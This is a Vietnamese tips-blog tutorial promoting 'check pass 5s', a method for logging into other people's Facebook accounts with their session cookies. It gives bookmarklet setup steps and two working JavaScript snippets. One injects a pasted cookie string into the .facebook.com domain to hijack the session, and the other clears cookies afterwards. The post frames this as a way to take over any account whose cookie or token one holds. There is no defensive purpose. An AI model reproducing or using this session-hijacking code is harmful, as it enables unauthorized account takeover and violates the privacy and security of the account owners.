Thời Gian Hiện Tại

tut check pass 5s bằng cookie facebook mới nhất 2018

tut check pass 5s bằng cookie facebook này được star huy it chế ra và không đụng hàng với ai nhé . với tut check pass 5s này ta có thể lấy bất cứ facebook nào mà ta có token facebook . tut check pass bằng cookie đã cập nhập 2018 mới nhất cho ae <3
các trình tự thực hiện
Bước 1: Ctrl + Shift + B để hiện thanh dấu trang
Bước 2: Chuột phải vào thanh dấu trang, thêm trang
Bước 3: Lưu trên dấu trang là check pass facebook 5s hay gì đó bạn thích
Bước 4: Copy đoạn javascript bên dưới dán vào phần địa chỉ

javascript:void(function(){ function setCookie(t) { var list = t.split("; "); console.log(list); for (var i = list.length - 1; i >= 0; i--) { var cname = list[i].split("=")[0]; var cvalue = list[i].split("=")[1]; var d = new Date(); d.setTime(d.getTime() + (7*24*60*60*1000)); var expires = ";domain=.facebook.com;expires="+ d.toUTCString(); document.cookie = cname + "=" + cvalue + "; " + expires; } } function hex2a(hex) { var str = ''; for (var i = 0; i < hex.length; i += 2) { var v = parseInt(hex.substr(i, 2), 16); if (v) str += String.fromCharCode(v); } return str; } var cookie = prompt("Nhập cookie vào bên dưới để đăng nhập", ""); setCookie(cookie); location.href = 'https://facebook.com'; })();
Bước 5: Lưu lại
Bước 6: tương tự với đoạn javascript xóa cookie để thoát facebook

javascript:void(function(){ function deleteAllCookiesFromCurrentDomain() { var cookies = document.cookie.split("; "); for (var c = 0; c < cookies.length; c++) { var d = window.location.hostname.split("."); while (d.length > 0) { var cookieBase = encodeURIComponent(cookies[c].split(";")[0].split("=")[0]) + '=; expires=Thu, 01-Jan-1970 00:00:01 GMT; domain=' + d.join('.') + ' ;path='; var p = location.pathname.split('/'); document.cookie = cookieBase + '/'; while (p.length > 0) { document.cookie = cookieBase + p.join('/'); p.pop(); }; d.shift(); } } } deleteAllCookiesFromCurrentDomain(); location.href = 'https://facebook.com'; })();
 các bước còn lại xem video này để thực hiện. lưu ý tut check pass 5s này chỉ thực hiện được trên máy tính nhé

XEM VIDEO DƯỚI ĐÂY ĐỂ BIẾT THÊM CHI TIẾT VỀ CHECK PASS 5S 2018


    Blogger Comment
    Facebook Comment

1 Nhận xét:

Star Huy IT - BLOG CHIA SẺ THỦ THUẬT CÔNG NGHỆ MIỄN PHÍ, THỦ THUẬT HAY, PHẦN MỀM TIỆN ÍCH